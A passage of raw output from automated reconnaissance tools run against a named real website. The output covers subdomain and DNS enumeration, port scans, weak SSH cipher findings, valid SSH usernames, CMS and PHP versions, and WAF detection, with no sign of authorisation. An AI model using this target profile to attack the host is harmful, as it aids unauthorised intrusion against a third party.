653. [-] Searching now in Yahoo..
654. [-] Searching now in Google..
655. [-] Searching now in Bing..
656. [-] Searching now in Ask..
657. [-] Searching now in Netcraft..
658. [-] Searching now in DNSdumpster..
659. [-] Searching now in Virustotal..
660. [-] Searching now in ThreatCrowd..
661. [-] Searching now in SSL Certificates..
662. [-] Searching now in PassiveDNS..
663. SSL Certificates: www.falange-autentica.es
664. Virustotal: www.falange-autentica.es
665. [!] Error: Google probably now is blocking our requests
666. [~] Finished now the Google Enumeration ...
667. [-] Saving results to file: /usr/share/sniper/loot/falange-autentica.es/domains/domains-falange-autentica.es.txt
668. [-] Total Unique Subdomains Found: 1
669. www.falange-autentica.es
670. #######################################################################################################################################
671. www.falange-autentica.es,91.121.2.184
672. falange-autentica.es,91.121.2.184
673. mail.falange-autentica.es,91.121.2.184
674. smtp.falange-autentica.es,193.70.18.144
675. #######################################################################################################################################
676. [*] Processing domain falange-autentica.es
677. [+] Getting nameservers
678. 213.251.188.150 - dns106.ovh.net
679. 213.251.128.150 - ns106.ovh.net
680. [-] Zone transfer failed
681.  
682. [+] TXT records found
683. "v=spf1 ip4:46.105.219.212 ~all"
684. "google-site-verification=XeCXnycOOchTyn4oLnoD2WYHlYWJFP_sTsHT9CVGEoE"
685. "v=spf1 a mx ip4:91.121.2.184 ~all"
686.  
687. [*] Scanning falange-autentica.es for A records
688. 91.121.2.184 - mail.falange-autentica.es
689. 193.70.18.144 - smtp.falange-autentica.es
690. 91.121.2.184 - falange-autentica.es
691. 91.121.2.184 - www.falange-autentica.es
692. #######################################################################################################################################
693. [*] Found SPF record:
694. [*] v=spf1 a mx ip4:91.121.2.184 ~all
695. [*] SPF record contains an All item: ~all
696. [*] Found DMARC record:
697. [*] v=DMARC1; p=quarantine; rua=mailto:admin@falange-autentica.es; ruf=mailto:admin@falange-autentica.es; sp=quarantine
698. [-] DMARC policy set to quarantine
699. [*] Aggregate reports will be sent: mailto:admin@falange-autentica.es
700. [*] Forensics reports will be sent: mailto:admin@falange-autentica.es
701. [-] Spoofing not possible for falange-autentica.es
702. #######################################################################################################################################
703. __
704. ____ _____ ___ ______ _/ /_____ ____ ___
705. / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
706. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
707. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
708. /_/ discover v0.5.0 - by @michenriksen
709.  
710. Identifying nameservers for falange-autentica.es... Done
711. Using nameservers:
712.  
713. - 213.251.188.150
714. - 213.251.128.150
715.  
716. Checking for wildcard DNS... Done
717.  
718. Running collector: Threat Crowd... Done (0 hosts)
719. Running collector: DNSDB... Error
720. -> DNSDB returned unexpected response code: 503
721. Running collector: Netcraft... Done (0 hosts)
722. Running collector: PublicWWW... Done (0 hosts)
723. Running collector: Censys... Skipped
724. -> Key 'censys_secret' has not been set
725. Running collector: Wayback Machine... Done (4 hosts)
726. Running collector: PTRArchive... Error
727. -> PTRArchive returned unexpected response code: 502
728. Running collector: PassiveTotal... Skipped
729. -> Key 'passivetotal_key' has not been set
730. Running collector: Shodan... Skipped
731. -> Key 'shodan' has not been set
732. Running collector: Riddler... Skipped
733. -> Key 'riddler_username' has not been set
734. Running collector: VirusTotal... Skipped
735. -> Key 'virustotal' has not been set
736. Running collector: Dictionary... Done (0 hosts)
737. Running collector: HackerTarget... Done (1 host)
738. Running collector: Google Transparency Report... Done (1 host)
739. Running collector: Certificate Search... Done (1 host)
740.  
741. Resolving 4 unique hosts...
742. 91.121.2.184 falange-autentica.es
743. 91.121.2.184 mail.falange-autentica.es
744. 91.121.2.184 www.falange-autentica.es
745.  
746. Found subnets:
747.  
748. - 91.121.2.0-255 : 3 hosts
749.  
750. Wrote 3 hosts to:
751.  
752. - file:///root/aquatone/falange-autentica.es/hosts.txt
753. - file:///root/aquatone/falange-autentica.es/hosts.json
754. __
755. ____ _____ ___ ______ _/ /_____ ____ ___
756. / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
757. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
758. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
759. /_/ takeover v0.5.0 - by @michenriksen
760.  
761. Loaded 3 hosts from /root/aquatone/falange-autentica.es/hosts.json
762. Loaded 25 domain takeover detectors
763.  
764. Identifying nameservers for falange-autentica.es... Done
765. Using nameservers:
766.  
767. - 213.251.188.150
768. - 213.251.128.150
769.  
770. Checking hosts for domain takeover vulnerabilities...
771.  
772. Finished checking hosts:
773.  
774. - Vulnerable : 0
775. - Not Vulnerable : 3
776.  
777. Wrote 0 potential subdomain takeovers to:
778.  
779. - file:///root/aquatone/falange-autentica.es/takeovers.json
780.  
781. __
782. ____ _____ ___ ______ _/ /_____ ____ ___
783. / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
784. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
785. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
786. /_/ scan v0.5.0 - by @michenriksen
787.  
788. Loaded 3 hosts from /root/aquatone/falange-autentica.es/hosts.json
789.  
790. Probing 2 ports...
791. 80/tcp 91.121.2.184 falange-autentica.es, mail.falange-autentica.es, www.falange-autentica.es
792. 443/tcp 91.121.2.184 falange-autentica.es, mail.falange-autentica.es, www.falange-autentica.es
793.  
794. Wrote open ports to file:///root/aquatone/falange-autentica.es/open_ports.txt
795. Wrote URLs to file:///root/aquatone/falange-autentica.es/urls.txt
796. __
797. ____ _____ ___ ______ _/ /_____ ____ ___
798. / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
799. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
800. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
801. /_/ gather v0.5.0 - by @michenriksen
802.  
803. Processing 6 pages...
804.  
805. Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
806. #######################################################################################################################################
807. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:17 EST
808. Nmap scan report for falange-autentica.es (91.121.2.184)
809. Host is up (0.11s latency).
810. Not shown: 465 filtered ports, 3 closed ports
811. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
812. PORT STATE SERVICE
813. 22/tcp open ssh
814. 80/tcp open http
815. 389/tcp open ldap
816. 443/tcp open https
817. 465/tcp open smtps
818. 993/tcp open imaps
819. 7071/tcp open iwg1
820. 8080/tcp open http-proxy
821. #######################################################################################################################################
822. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:17 EST
823. Nmap scan report for falange-autentica.es (91.121.2.184)
824. Host is up (0.10s latency).
825. Not shown: 2 filtered ports
826. PORT STATE SERVICE
827. 53/udp open|filtered domain
828. 67/udp open|filtered dhcps
829. 68/udp open|filtered dhcpc
830. 69/udp open|filtered tftp
831. 88/udp open|filtered kerberos-sec
832. 123/udp open|filtered ntp
833. 139/udp open|filtered netbios-ssn
834. 161/udp open|filtered snmp
835. 162/udp open|filtered snmptrap
836. 389/udp open|filtered ldap
837. 520/udp open|filtered route
838. 2049/udp open|filtered nfs
839. #######################################################################################################################################
840. # general
841. (gen) banner: SSH-2.0-OpenSSH_5.3
842. (gen) software: OpenSSH 5.3
843. (gen) compatibility: OpenSSH 5.9-6.6, Dropbear SSH 2013.56+ (some functionality from 0.52)
844. (gen) compression: enabled (zlib@openssh.com)
845.  
846. # key exchange algorithms
847. (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
848. `- [info] available since OpenSSH 4.4
849. (kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
850. `- [warn] using weak hashing algorithm
851. `- [info] available since OpenSSH 2.3.0
852. (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
853. `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
854. (kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
855. `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
856. `- [warn] using small 1024-bit modulus
857. `- [warn] using weak hashing algorithm
858. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
859.  
860. # host-key algorithms
861. (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
862. (key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
863. `- [warn] using small 1024-bit modulus
864. `- [warn] using weak random number generator could reveal the key
865. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
866.  
867. # encryption algorithms (ciphers)
868. (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
869. (enc) aes192-ctr -- [info] available since OpenSSH 3.7
870. (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
871. (enc) arcfour256 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
872. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
873. `- [warn] using weak cipher
874. `- [info] available since OpenSSH 4.2
875. (enc) arcfour128 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
876. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
877. `- [warn] using weak cipher
878. `- [info] available since OpenSSH 4.2
879. (enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
880. `- [warn] using weak cipher mode
881. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
882. (enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
883. `- [warn] using weak cipher
884. `- [warn] using weak cipher mode
885. `- [warn] using small 64-bit block size
886. `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
887. (enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
888. `- [fail] disabled since Dropbear SSH 0.53
889. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
890. `- [warn] using weak cipher mode
891. `- [warn] using small 64-bit block size
892. `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
893. (enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
894. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
895. `- [warn] using weak cipher mode
896. `- [warn] using small 64-bit block size
897. `- [info] available since OpenSSH 2.1.0
898. (enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
899. `- [warn] using weak cipher mode
900. `- [info] available since OpenSSH 2.3.0
901. (enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
902. `- [warn] using weak cipher mode
903. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
904. (enc) arcfour -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
905. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
906. `- [warn] using weak cipher
907. `- [info] available since OpenSSH 2.1.0
908. (enc) rijndael-cbc@lysator.liu.se -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
909. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
910. `- [warn] using weak cipher mode
911. `- [info] available since OpenSSH 2.3.0
912.  
913. # message authentication code algorithms
914. (mac) hmac-md5 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
915. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
916. `- [warn] using encrypt-and-MAC mode
917. `- [warn] using weak hashing algorithm
918. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
919. (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
920. `- [warn] using weak hashing algorithm
921. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
922. (mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
923. `- [warn] using small 64-bit tag size
924. `- [info] available since OpenSSH 4.7
925. (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
926. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
927. (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
928. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
929. (mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
930. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
931. `- [warn] using encrypt-and-MAC mode
932. `- [info] available since OpenSSH 2.5.0
933. (mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
934. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
935. `- [warn] using encrypt-and-MAC mode
936. `- [info] available since OpenSSH 2.1.0
937. (mac) hmac-sha1-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
938. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
939. `- [warn] using encrypt-and-MAC mode
940. `- [warn] using weak hashing algorithm
941. `- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.47
942. (mac) hmac-md5-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
943. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
944. `- [warn] using encrypt-and-MAC mode
945. `- [warn] using weak hashing algorithm
946. `- [info] available since OpenSSH 2.5.0
947.  
948. # algorithm recommendations (for OpenSSH 5.3)
949. (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
950. (rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
951. (rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
952. (rec) -ssh-dss -- key algorithm to remove
953. (rec) -arcfour -- enc algorithm to remove
954. (rec) -rijndael-cbc@lysator.liu.se -- enc algorithm to remove
955. (rec) -blowfish-cbc -- enc algorithm to remove
956. (rec) -3des-cbc -- enc algorithm to remove
957. (rec) -aes256-cbc -- enc algorithm to remove
958. (rec) -arcfour256 -- enc algorithm to remove
959. (rec) -cast128-cbc -- enc algorithm to remove
960. (rec) -aes192-cbc -- enc algorithm to remove
961. (rec) -arcfour128 -- enc algorithm to remove
962. (rec) -aes128-cbc -- enc algorithm to remove
963. (rec) -hmac-md5-96 -- mac algorithm to remove
964. (rec) -hmac-ripemd160 -- mac algorithm to remove
965. (rec) -hmac-sha1-96 -- mac algorithm to remove
966. (rec) -umac-64@openssh.com -- mac algorithm to remove
967. (rec) -hmac-md5 -- mac algorithm to remove
968. (rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
969. (rec) -hmac-sha1 -- mac algorithm to remove
970. #######################################################################################################################################
971. ftp is a valid user!
972. mail is a valid user!
973. mysql is a valid user!
974. nobody is a valid user!
975. postfix is a valid user!
976. root is a valid user!
977. #######################################################################################################################################
978.  
979. libssh scanner 1.0.4
980. #######################################################################################################################################
981. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:18 EST
982. NSE: [ssh-run] Failed to specify credentials and command to run.
983. Nmap scan report for falange-autentica.es (91.121.2.184)
984. Host is up (0.12s latency).
985.  
986. PORT STATE SERVICE VERSION
987. 22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
988. | ssh-auth-methods:
989. | Supported authentication methods:
990. | publickey
991. | gssapi-keyex
992. |_ gssapi-with-mic
993. |_ssh-brute: Password authentication not allowed
994. | ssh-hostkey:
995. | 1024 e4:7e:99:a4:23:fd:8c:a3:e7:a5:1f:21:8c:e8:68:0f (DSA)
996. |_ 2048 cf:fd:6c:82:51:78:63:3c:c0:33:e0:ab:05:9e:af:07 (RSA)
997. | ssh-publickey-acceptance:
998. |_ Accepted Public Keys: No public keys accepted
999. |_ssh-run: Failed to specify credentials and command to run.
1000. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
1001. Aggressive OS guesses: Linux 2.6.32 (92%), Linux 3.10 (92%), Linux 3.2 (92%), Linux 3.4 - 3.10 (92%), Linux 3.8 (92%), Linux 2.6.32 - 3.10 (92%), Linux 2.6.32 - 3.13 (92%), Linux 2.6.32 - 3.9 (92%), Linux 2.6.32 - 3.1 (90%), Linux 3.11 (90%)
1002. No exact OS matches for host (test conditions non-ideal).
1003. Network Distance: 8 hops
1004.  
1005. TRACEROUTE (using port 22/tcp)
1006. HOP RTT ADDRESS
1007. 1 104.09 ms 10.251.200.1
1008. 2 119.51 ms 185.94.189.129
1009. 3 ...
1010. 4 116.12 ms 94.23.122.146
1011. 5 ...
1012. 6 115.18 ms 91.121.131.219
1013. 7 ...
1014. 8 115.33 ms 91.121.2.184
1015.  
1016. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
1017. Nmap done: 1 IP address (1 host up) scanned in 53.09 seconds
1018. #######################################################################################################################################
1019. USER_FILE => /brutex/wordlists/simple-users.txt
1020. RHOSTS => falange-autentica.es
1021. RHOST => falange-autentica.es
1022. [+] 91.121.2.184:22 - SSH server version: SSH-2.0-OpenSSH_5.3 ( service.version=5.3 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:5.3 service.protocol=ssh fingerprint_db=ssh.banner )
1023. [*] falange-autentica.es:22 - Scanned 1 of 1 hosts (100% complete)
1024. [*] Auxiliary module execution completed
1025. [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE.
1026. [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE, KEY_FILE.
1027. [+] 91.121.2.184:22 - SSH server version: SSH-2.0-OpenSSH_5.3 ( service.version=5.3 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:5.3 service.protocol=ssh fingerprint_db=ssh.banner )
1028. [*] falange-autentica.es:22 - Scanned 1 of 1 hosts (100% complete)
1029. [*] Auxiliary module execution completed
1030. + -- --=[Port 23 closed... skipping.
1031. + -- --=[Port 25 closed... skipping.
1032. + -- --=[Port 53 closed... skipping.
1033. + -- --=[Port 67 opened... running tests...
1034. #######################################################################################################################################
1035. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:19 EST
1036. Nmap scan report for falange-autentica.es (91.121.2.184)
1037. Host is up (0.12s latency).
1038.  
1039. PORT STATE SERVICE VERSION
1040. 67/udp open|filtered dhcps
1041. |_dhcp-discover: ERROR: Script execution failed (use -d to debug)
1042. Too many fingerprints match this host to give specific OS details
1043. Network Distance: 8 hops
1044.  
1045. TRACEROUTE (using proto 1/icmp)
1046. HOP RTT ADDRESS
1047. 1 106.02 ms 10.251.200.1
1048. 2 106.89 ms 185.94.189.129
1049. 3 ...
1050. 4 117.80 ms 94.23.122.146
1051. 5 ...
1052. 6 116.36 ms 91.121.131.219
1053. 7 ...
1054. 8 116.40 ms 91.121.2.184
1055.  
1056. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
1057. Nmap done: 1 IP address (1 host up) scanned in 139.59 seconds
1058. + -- --=[Port 68 opened... running tests...
1059. #######################################################################################################################################
1060. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:22 EST
1061. Nmap scan report for falange-autentica.es (91.121.2.184)
1062. Host is up (0.11s latency).
1063.  
1064. PORT STATE SERVICE VERSION
1065. 68/udp open|filtered dhcpc
1066. Too many fingerprints match this host to give specific OS details
1067. Network Distance: 8 hops
1068.  
1069. TRACEROUTE (using proto 1/icmp)
1070. HOP RTT ADDRESS
1071. 1 103.13 ms 10.251.200.1
1072. 2 103.18 ms 185.94.189.129
1073. 3 ...
1074. 4 161.84 ms 94.23.122.146
1075. 5 ...
1076. 6 113.40 ms 91.121.131.219
1077. 7 ...
1078. 8 113.53 ms 91.121.2.184
1079. #######################################################################################################################################
1080. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:24 EST
1081. Nmap scan report for falange-autentica.es (91.121.2.184)
1082. Host is up (0.11s latency).
1083.  
1084. PORT STATE SERVICE VERSION
1085. 69/udp open|filtered tftp
1086. Too many fingerprints match this host to give specific OS details
1087. Network Distance: 8 hops
1088.  
1089. TRACEROUTE (using proto 1/icmp)
1090. HOP RTT ADDRESS
1091. 1 103.34 ms 10.251.200.1
1092. 2 106.55 ms 185.94.189.129
1093. 3 ...
1094. 4 114.77 ms 94.23.122.146
1095. 5 ...
1096. 6 113.85 ms 91.121.131.219
1097. 7 ...
1098. 8 113.89 ms 91.121.2.184
1099. #######################################################################################################################################
1100.  
1101. ^ ^
1102. _ __ _ ____ _ __ _ _ ____
1103. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
1104. | V V // o // _/ | V V // 0 // 0 // _/
1105. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
1106. <
1107. ...'
1108.  
1109. WAFW00F - Web Application Firewall Detection Tool
1110.  
1111. By Sandro Gauci && Wendel G. Henrique
1112.  
1113. Checking http://falange-autentica.es
1114. The site http://falange-autentica.es is behind a ModSecurity (OWASP CRS)
1115. Number of requests: 11
1116. #######################################################################################################################################
1117.  
1118. wig - WebApp Information Gatherer
1119.  
1120.  
1121. Scanning http://falange-autentica.es...
1122. ___________________________________________ SITE INFO ___________________________________________
1123. IP Title
1124. 91.121.2.184 Falange Auténtica
1125.  
1126. ____________________________________________ VERSION ____________________________________________
1127. Name Versions Type
1128. Joomla! 3 | 3.3.1 | 3.3.1.rc | 3.3.2 | 3.3.2.rc | 3.3.3 | 3.3.4 CMS
1129. 3.3.5 | 3.3.6 | 3.4.0 | 3.4.0-alpha | 3.4.0-beta1
1130. 3.4.0-beta2 | 3.4.0-beta3 | 3.4.0-rc | 3.4.1 | 3.4.1-rc
1131. 3.4.1-rc2 | 3.4.2 | 3.4.2-rc | 3.4.3 | 3.4.4 | 3.4.4-rc
1132. 3.4.4-rc2 | 3.4.5 | 3.4.6 | 3.4.7 | 3.4.8 | 3.4.8-rc | 3.5.0
1133. 3.5.0-beta | 3.5.0-beta2 | 3.5.0-beta3 | 3.5.0-beta4
1134. 3.5.0-beta5 | 3.5.0-rc | 3.5.0-rc2 | 3.5.0-rc3 | 3.5.0-rc4
1135. 3.5.1 | 3.5.1-rc | 3.5.1-rc2 | 3.6.0 | 3.6.0-alpha
1136. 3.6.0-beta1 | 3.6.0-beta2 | 3.6.0-rc | 3.6.0-rc2 | 3.6.1
1137. 3.6.1-rc1 | 3.6.1-rc2 | 3.6.2 | 3.6.3-rc1
1138. Apache Platform
1139. PHP 5.6.14 Platform
1140. openSUSE tumbleweed OS
1141.  
1142. __________________________________________ INTERESTING __________________________________________
1143. URL Note Type
1144. /robots.txt robots.txt index Interesting
1145.  
1146. _____________________________________________ TOOLS _____________________________________________
1147. Name Link Software
1148. CMSmap https://github.com/Dionach/CMSmap Joomla!
1149. joomscan http://sourceforge.net/projects/joomscan/ Joomla!
1150.  
1151. _________________________________________________________________________________________________
1152. Time: 53.5 sec Urls: 413 Fingerprints: 40401
1153. #######################################################################################################################################
1154. HTTP/1.1 200 OK
1155. Date: Wed, 07 Nov 2018 22:28:27 GMT
1156. Server: Apache
1157. X-Powered-By: PHP/5.6.14
1158. Set-Cookie: 2b5581ae182de78f0daf6795785a3ed8=ck1qlfviu1d285h49t57no86j5; path=/; HttpOnly
1159. Expires: Wed, 17 Aug 2005 00:00:00 GMT
1160. Last-Modified: Wed, 07 Nov 2018 22:28:28 GMT
1161. Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
1162. Pragma: no-cache
1163. Vary: Accept-Encoding
1164. Content-Type: text/html; charset=utf-8
1165. #######################################################################################################################################
1166. ---------------------------------------------------------------------------------------------------------------------------------------
1167.  
1168. [ ! ] Starting SCANNER INURLBR 2.1 at [07-11-2018 17:29:07]
1169. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
1170. It is the end user's responsibility to obey all applicable local, state and federal laws.
1171. Developers assume no liability and are not responsible for any misuse or damage caused by this program
1172.  
1173. [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-falange-autentica.es.txt ]
1174. [ INFO ][ DORK ]::[ site:falange-autentica.es ]
1175. [ INFO ][ SEARCHING ]:: {
1176. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.com.by ]
1177.  
1178. [ INFO ][ SEARCHING ]::
1179. -[:::]
1180. [ INFO ][ ENGINE ]::[ GOOGLE API ]
1181.  
1182. [ INFO ][ SEARCHING ]::
1183. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
1184. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.co.nz ID: 010479943387663786936:wjwf2xkhfmq ]
1185.  
1186. [ INFO ][ SEARCHING ]::
1187. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
1188.  
1189. [ INFO ][ TOTAL FOUND VALUES ]:: [ 0 ]
1190. [ INFO ] Not a satisfactory result was found!
1191.  
1192.  
1193. [ INFO ] [ Shutting down ]
1194. [ INFO ] [ End of process INURLBR at [07-11-2018 17:29:14]
1195. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
1196. [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-falange-autentica.es.txt ]
1197. |_________________________________________________________________________________________
1198.  
1199. \_________________________________________________________________________________________/
1200. #######################################################################################################################################
1201. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:29 EST
1202. Nmap scan report for falange-autentica.es (91.121.2.184)
1203. Host is up (0.12s latency).
1204.  
1205. PORT STATE SERVICE VERSION
1206. 123/udp open|filtered ntp
1207. Too many fingerprints match this host to give specific OS details
1208. Network Distance: 8 hops
1209.  
1210. TRACEROUTE (using proto 1/icmp)
1211. HOP RTT ADDRESS
1212. 1 106.48 ms 10.251.200.1
1213. 2 116.08 ms 185.94.189.129
1214. 3 ...
1215. 4 117.59 ms 94.23.122.146
1216. 5 ...
1217. 6 116.58 ms 91.121.131.219
1218. 7 ...
1219. 8 116.68 ms 91.121.2.184
1220. #######################################################################################################################################
1221. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:31 EST
1222. Nmap scan report for falange-autentica.es (91.121.2.184)
1223. Host is up (0.12s latency).
1224.  
1225. PORT STATE SERVICE VERSION
1226. 161/tcp filtered snmp
1227. 161/udp open|filtered snmp
1228. Too many fingerprints match this host to give specific OS details
1229. Network Distance: 8 hops
1230.  
1231. TRACEROUTE (using proto 1/icmp)
1232. HOP RTT ADDRESS
1233. 1 103.86 ms 10.251.200.1
1234. 2 104.06 ms 185.94.189.129
1235. 3 ...
1236. 4 115.46 ms 94.23.122.146
1237. 5 ...
1238. 6 114.19 ms 91.121.131.219
1239. 7 ...
1240. 8 179.63 ms 91.121.2.184
1241. #######################################################################################################################################
1242. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:34 EST
1243. Nmap scan report for falange-autentica.es (91.121.2.184)
1244. Host is up (0.11s latency).
1245.  
1246. PORT STATE SERVICE VERSION
1247. 389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
1248. | ldap-rootdse:
1249. | LDAP Results
1250. | <ROOT>
1251. | namingContexts:
1252. | supportedControl: 1.3.6.1.4.1.4203.666.5.18
1253. | supportedControl: 1.3.6.1.4.1.4203.1.9.1.1
1254. | supportedControl: 1.3.6.1.4.1.21008.108.63.1
1255. | supportedControl: 2.16.840.1.113730.3.4.18
1256. | supportedControl: 2.16.840.1.113730.3.4.2
1257. | supportedControl: 1.3.6.1.4.1.4203.666.5.12
1258. | supportedControl: 1.3.6.1.4.1.4203.666.5.2
1259. | supportedControl: 1.3.6.1.4.1.4203.1.10.1
1260. | supportedControl: 1.2.840.113556.1.4.1340
1261. | supportedControl: 1.2.840.113556.1.4.805
1262. | supportedControl: 1.2.840.113556.1.4.1413
1263. | supportedControl: 1.3.6.1.4.1.4203.666.5.15
1264. | supportedControl: 1.2.840.113556.1.4.1339
1265. | supportedControl: 1.2.840.113556.1.4.319
1266. | supportedControl: 1.2.826.0.1.3344810.2.3
1267. | supportedControl: 1.3.6.1.1.13.2
1268. | supportedControl: 1.3.6.1.1.13.1
1269. | supportedControl: 1.3.6.1.1.12
1270. | supportedExtension: 1.3.6.1.4.1.1466.20037
1271. | supportedExtension: 1.3.6.1.4.1.4203.1.11.1
1272. | supportedExtension: 1.3.6.1.4.1.4203.1.11.3
1273. | supportedExtension: 1.3.6.1.1.8
1274. | supportedLDAPVersion: 3
1275. | supportedSASLMechanisms: SCRAM-SHA-1
1276. | supportedSASLMechanisms: GSSAPI
1277. | supportedSASLMechanisms: DIGEST-MD5
1278. | supportedSASLMechanisms: OTP
1279. | supportedSASLMechanisms: CRAM-MD5
1280. |_ subschemaSubentry: cn=Subschema
1281. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
1282. Aggressive OS guesses: Linux 3.10 (92%), Linux 3.4 - 3.10 (92%), Linux 2.6.32 - 3.10 (92%), Linux 2.6.32 - 3.13 (92%), Linux 2.6.32 - 3.9 (92%), Linux 2.6.32 (90%), Linux 3.11 (90%), Linux 3.5 (90%), Synology DiskStation Manager 5.2-5644 (90%), Crestron XPanel control system (90%)
1283. No exact OS matches for host (test conditions non-ideal).
1284. Network Distance: 8 hops
1285.  
1286. TRACEROUTE (using port 389/tcp)
1287. HOP RTT ADDRESS
1288. 1 103.68 ms 10.251.200.1
1289. 2 103.73 ms 185.94.189.129
1290. 3 ...
1291. 4 171.68 ms 94.23.122.146
1292. 5 ...
1293. 6 114.25 ms 94.23.122.73
1294. 7 ...
1295. 8 113.66 ms 91.121.2.184
1296. #######################################################################################################################################
1297.  
1298. ^ ^
1299. _ __ _ ____ _ __ _ _ ____
